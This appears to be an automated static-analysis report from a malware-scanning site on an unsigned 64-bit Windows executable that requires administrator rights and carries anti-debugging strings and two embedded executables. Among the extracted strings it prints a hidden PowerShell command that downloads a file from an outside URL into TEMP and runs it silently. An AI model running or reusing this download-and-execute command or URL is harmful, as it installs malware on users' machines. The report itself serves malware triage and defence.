PREMIUM PESCAN.IO - Analysis Report

File Structure
Analysis Image
PE Chart Code
Executable header (light blue)
Executable sections (pink)
Non-executable sections (black)
External injected code (red)
File Structure in red = malformed or corrupted header
Chart Code For Other Files
Printable characters (blue)
Non-printable characters (black)
Information
Size: 284,00 KB
SHA-256 Hash: 29F483E4931773693ADA4CE1A1ED1BDCE9A4DF4664771F72D62A5395894A7FFA
SHA-1 Hash: DBD2474D50C8C1E630FDDAC4E64BB6F8E21BB166
MD5 Hash: 5A12B7B7AE0B0038D6D699C83405AD72
Imphash: 97D2D684309CF7A1244A9CA45A0086E2
MajorOSVersion: 6
MinorOSVersion: 0
CheckSum: 00000000
EntryPoint (rva): 4D98
SizeOfHeaders: 400
SizeOfImage: 4C000
ImageBase: 0000000140000000
Architecture: x64
ImportTable: 46234
IAT: 6000
Characteristics: 22
TimeDateStamp: 692FA672
Date: 03/12/2025 2:54:42
File Type: EXE
Number Of Sections: 6
ASLR: Disabled
Section Names (Optional Header): .text, .rdata, .data, .pdata, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows GUI
UAC Execution Level Manifest: requireAdministrator
Sections Info
Section Name Flags ROffset RSize VOffset VSizeEntropyChi2
.text 60000020 (Code, Executable, Readable) 400 4C00 1000 4BE56,3056151113,26
.rdata 40000040 (Initialized Data, Readable) 5000 41400 6000 412A67,7808271157,68
.data C0000040 (Initialized Data, Readable, Writeable) 46400 200 48000 8182,951147003,00
.pdata 40000040 (Initialized Data, Readable) 46600 600 49000 4203,4353143411,33
.rsrc 40000040 (Initialized Data, Readable) 46C00 200 4A000 1E84,76818288,00
.reloc 42000040 (Initialized Data, GP-Relative, Readable) 46E00 200 4B000 881,639183057,00
Binder/Joiner/Crypter
2 Executable files found
Entry Point
The section number (1) have the Entry Point
Information -> EntryPoint (calculated) - 4198
Code -> 4883EC28E8130400004883C428E97AFEFFFFCCCC40534883EC20488BD933C9FF1503130000488BCBFF154A130000FF153C13
SUB RSP, 0X28
CALL 0X141C
ADD RSP, 0X28
JMP 0XE8C
INT3
INT3
PUSH RBX
SUB RSP, 0X20
MOV RBX, RCX
XOR ECX, ECX
CALL QWORD PTR [RIP + 0X1303]
MOV RCX, RBX
CALL QWORD PTR [RIP + 0X134A]
Signatures
Rich Signature Analyzer:
Code -> 137E0A54571F6407571F6407571F64075E67F7075B1F6407D0966706531F6407D09660065D1F6407D09661064E1F6407D0966506511F6407239E6506581F6407571F6507DB1F6407C6966D06561F6407C6969B07561F6407C6966606561F640752696368571F6407
Footprint md5 Hash -> 695CEA25ABCE53173C2E09A58FC55A5E
• The Rich header apparently has not been modified
Certificate - Digital Signature Not Found:
• The file is not signed
Packer/Compiler
Detect It Easy (die)
PE+(64): compiler: Microsoft Visual C/C++(-)[-]
PE+(64): linker: Microsoft Linker(14.44**)[-]
Entropy: 7.70431
Suspicious Functions
Library Function Description
KERNEL32.DLL VirtualAlloc Reserve, commit, or both, a region of memory within the virtual address space of a process.
KERNEL32.DLL GetModuleHandleA Retrieves a handle to the specified module.
KERNEL32.DLL LoadLibraryA Loads the specified module into the address space of the calling process.
KERNEL32.DLL GetProcAddress Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
KERNEL32.DLL IsDebuggerPresent Determines if the calling process is being debugged by a user-mode debugger.
Windows REG (UNICODE)
System\Core.dll
File Access
TEMP\BK598146.exe
start /min cmd.exe
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
VCRUNTIME140.dll
VCRUNTIME140_1.dll
MSIMG32.dll
gdiplus.dll
COMCTL32.dll
MSVCP140.dll
ole32.dll
GDI32.dll
USER32.dll
KERNEL32.dll
api-ms-win-crt-utility-l1-1-0.dll
WININET.dll
.dat
@.dat
hSoTjMPgKZmtpimvUjLW012.txt
Temp
File Access (UNICODE)
ProgramFiles
Interest's Words
exec
powershell
start
shutdown
systeminfo
Interest's Words (UNICODE)
Virus
URLs
https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt
PE Carving
Start Offset Header End Offset Size (Bytes)
0 38520 38520
38520 47000 EAE0
Strings/Hex Code Found With The File Rules
Rule Type Encoding Matched (Word)
Text Ascii Anti-Analysis VM (IsDebuggerPresent)
Text Ascii Anti-Analysis VM (GetSystemInfo)
Text Ascii Anti-Analysis VM (GlobalMemoryStatusEx)
Text Ascii Stealth (CloseHandle)
Text Ascii Stealth (IsBadReadPtr)
Text Ascii Stealth (VirtualAlloc)
Text Ascii Stealth (VirtualProtect)
Entry Point Hex Pattern Microsoft Visual C++ 8.0 (DLL)
Resources
Path DataRVA Size FileOffset CodeText
\24\1\1033 4A060 188 46C60 3C3F786D6C2076657273696F6E3D27312E302720656E636F64696E673D275554462D3827207374616E64616C6F6E653D2779<?xml version='1.0' encoding='UTF-8' standalone='y
Intelligent String
• api-ms-win-crt-locale-l1-1-0.dll
• api-ms-win-crt-stdio-l1-1-0.dll
• api-ms-win-crt-math-l1-1-0.dll
• api-ms-win-crt-string-l1-1-0.dll
• api-ms-win-crt-runtime-l1-1-0.dll
• api-ms-win-crt-utility-l1-1-0.dll
• api-ms-win-crt-heap-l1-1-0.dll
• <_register_onexit_function_crt_atexitgterminateapi-ms-win-crt-runtime-l1-1-0.dll
• VCRUNTIME140_1.dll
• MSVCP140.dll
• KERNEL32.dll
• .bss
• string too longstart /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe; Start-Process -FilePath $env:TEMP\BK598146.exe -WindowStyle Hidden }"
• %PROGRAMFILES%\Image-Line\FL Studio 21\System\Core.dll
• kernel32.dll
• COMCTL32.dll
• gdiplus.dll
• MSIMG32.dll
• VCRUNTIME140.dll
• <_register_onexit_function_crt_atexitapi-ms-win-crt-heap-l1-1-0.dll
Flow Anomalies
Offset RVA Section Description
4EB N/A .text CALL QWORD PTR [RIP+0x52EF]
53F N/A .text CALL QWORD PTR [RIP+0x5293]
584 N/A .text CALL QWORD PTR [RIP+0x5166]
5DD N/A .text CALL QWORD PTR [RIP+0x5105]
61F N/A .text JMP QWORD PTR [RIP+0x50C3]
6A4 N/A .text CALL QWORD PTR [RIP+0x5046]
6E4 N/A .text CALL QWORD PTR [RIP+0x5006]
70B N/A .text CALL QWORD PTR [RIP+0x4EAF]
73D N/A .text CALL QWORD PTR [RIP+0x511D]
752 N/A .text CALL QWORD PTR [RIP+0x50D8]
7AA N/A .text CALL QWORD PTR [RIP+0x5098]
7BC N/A .text CALL QWORD PTR [RIP+0x5096]
82D N/A .text CALL QWORD PTR [RIP+0x4D9D]
836 N/A .text CALL QWORD PTR [RIP+0x4D74]
90A N/A .text CALL QWORD PTR [RIP+0x4E90]
953 N/A .text CALL QWORD PTR [RIP+0x4C6F]
A28 N/A .text CALL QWORD PTR [RIP+0x4BA2]
A31 N/A .text CALL QWORD PTR [RIP+0x4B79]
B6A N/A .text CALL QWORD PTR [RIP+0x49C0]
BC5 N/A .text CALL QWORD PTR [RIP+0x4995]
C5D N/A .text CALL QWORD PTR [RIP+0x49BD]
C6C N/A .text CALL QWORD PTR [RIP+0x49AE]
C7E N/A .text CALL QWORD PTR [RIP+0x499C]
C96 N/A .text CALL QWORD PTR [RIP+0x494C]
CAA N/A .text CALL QWORD PTR [RIP+0x4978]
CED N/A .text CALL QWORD PTR [RIP+0x4A7D]
D14 N/A .text CALL QWORD PTR [RIP+0x488E]
D29 N/A .text CALL QWORD PTR [RIP+0x48A9]
D3D N/A .text CALL QWORD PTR [RIP+0x4895]
F7E N/A .text CALL QWORD PTR [RIP+0x4854]
FCA N/A .text CALL QWORD PTR [RIP+0x4618]
FD7 N/A .text CALL QWORD PTR [RIP+0x46CB]
1025 N/A .text CALL QWORD PTR [RIP+0x47AD]
1076 N/A .text CALL QWORD PTR [RIP+0x456C]
1083 N/A .text CALL QWORD PTR [RIP+0x461F]
10D1 N/A .text CALL QWORD PTR [RIP+0x4701]
112F N/A .text CALL QWORD PTR [RIP+0x44B3]
113C N/A .text CALL QWORD PTR [RIP+0x4566]
1142 N/A .text CALL QWORD PTR [RIP+0x4480]
11F0 N/A .text CALL QWORD PTR [RIP+0x43DA]
11F9 N/A .text CALL QWORD PTR [RIP+0x43B1]
1301 N/A .text CALL QWORD PTR [RIP+0x4319]
1387 N/A .text CALL QWORD PTR [RIP+0x444B]
140A N/A .text CALL QWORD PTR [RIP+0x41D8]
1417 N/A .text CALL QWORD PTR [RIP+0x428B]
1469 N/A .text CALL QWORD PTR [RIP+0x4369]
14A6 N/A .text CALL QWORD PTR [RIP+0x413C]
14B3 N/A .text CALL QWORD PTR [RIP+0x41EF]
1505 N/A .text CALL QWORD PTR [RIP+0x42CD]
152E N/A .text JMP QWORD PTR [RIP+0x40D4]
15AA N/A .text CALL QWORD PTR [RIP+0x3F80]
163C N/A .text CALL QWORD PTR [RIP+0x3EBE]
16D8 N/A .text CALL QWORD PTR [RIP+0x3E92]
1749 N/A .text CALL QWORD PTR [RIP+0x3E21]
1987 N/A .text CALL QWORD PTR [RIP+0x3C3B]
1A21 N/A .text CALL QWORD PTR [RIP+0x3BA9]
1A2A N/A .text CALL QWORD PTR [RIP+0x3B80]
1B12 N/A .text CALL QWORD PTR [RIP+0x3A38]
1BB1 N/A .text CALL QWORD PTR [RIP+0x3969]
1CDB N/A .text CALL QWORD PTR [RIP+0x383F]
1CF4 N/A .text CALL QWORD PTR [RIP+0x385E]
1D37 N/A .text CALL QWORD PTR [RIP+0x388B]
1DD1 N/A .text CALL QWORD PTR [RIP+0x37F9]
1DDA N/A .text CALL QWORD PTR [RIP+0x37D0]
1ED5 N/A .text CALL QWORD PTR [RIP+0x36AD]
1FF4 N/A .text CALL QWORD PTR [RIP+0x3506]
206F N/A .text CALL QWORD PTR [RIP+0x3553]
2111 N/A .text CALL QWORD PTR [RIP+0x34B9]
211A N/A .text CALL QWORD PTR [RIP+0x3490]
2215 N/A .text CALL QWORD PTR [RIP+0x330D]
222E N/A .text CALL QWORD PTR [RIP+0x3394]
22D0 N/A .text CALL QWORD PTR [RIP+0x32FA]
22D9 N/A .text CALL QWORD PTR [RIP+0x32D1]
23D8 N/A .text CALL QWORD PTR [RIP+0x319A]
23E8 N/A .text CALL QWORD PTR [RIP+0x314A]
251F N/A .text CALL QWORD PTR [RIP+0x32B3]
2592 N/A .text CALL QWORD PTR [RIP+0x3240]
2604 N/A .text CALL QWORD PTR [RIP+0x308E]
2620 N/A .text CALL QWORD PTR [RIP+0x2DFA]
2634 N/A .text CALL QWORD PTR [RIP+0x2FBE]
263D N/A .text CALL QWORD PTR [RIP+0x2DD5]
2654 N/A .text CALL QWORD PTR [RIP+0x2E1E]
2663 N/A .text CALL QWORD PTR [RIP+0x2DF7]
267E N/A .text CALL QWORD PTR [RIP+0x2DB4]
2693 N/A .text CALL QWORD PTR [RIP+0x2D97]
269F N/A .text CALL QWORD PTR [RIP+0x2DBB]
26A8 N/A .text CALL QWORD PTR [RIP+0x2D6A]
26B4 N/A .text CALL QWORD PTR [RIP+0x2DB6]
26C2 N/A .text CALL QWORD PTR [RIP+0x2D78]
26D2 N/A .text CALL QWORD PTR [RIP+0x2D88]
2722 N/A .text CALL QWORD PTR [RIP+0x2F48]
272D N/A .text CALL QWORD PTR [RIP+0x2D0D]
2785 N/A .text CALL QWORD PTR [RIP+0x2EE5]
2791 N/A .text CALL QWORD PTR [RIP+0x2CC9]
27A9 N/A .text CALL QWORD PTR [RIP+0x2C71]
27BC N/A .text CALL QWORD PTR [RIP+0x2E36]
27C5 N/A .text CALL QWORD PTR [RIP+0x2C4D]
27DC N/A .text CALL QWORD PTR [RIP+0x2C76]
2800 N/A .text CALL QWORD PTR [RIP+0x2C5A]
2824 N/A .text CALL QWORD PTR [RIP+0x2C56]
Extra Analysis
Metric Value Percentage
Ascii Code 187755 64,5614%
Null Byte Code 22314 7,6729%
© 2026 All rights reserved.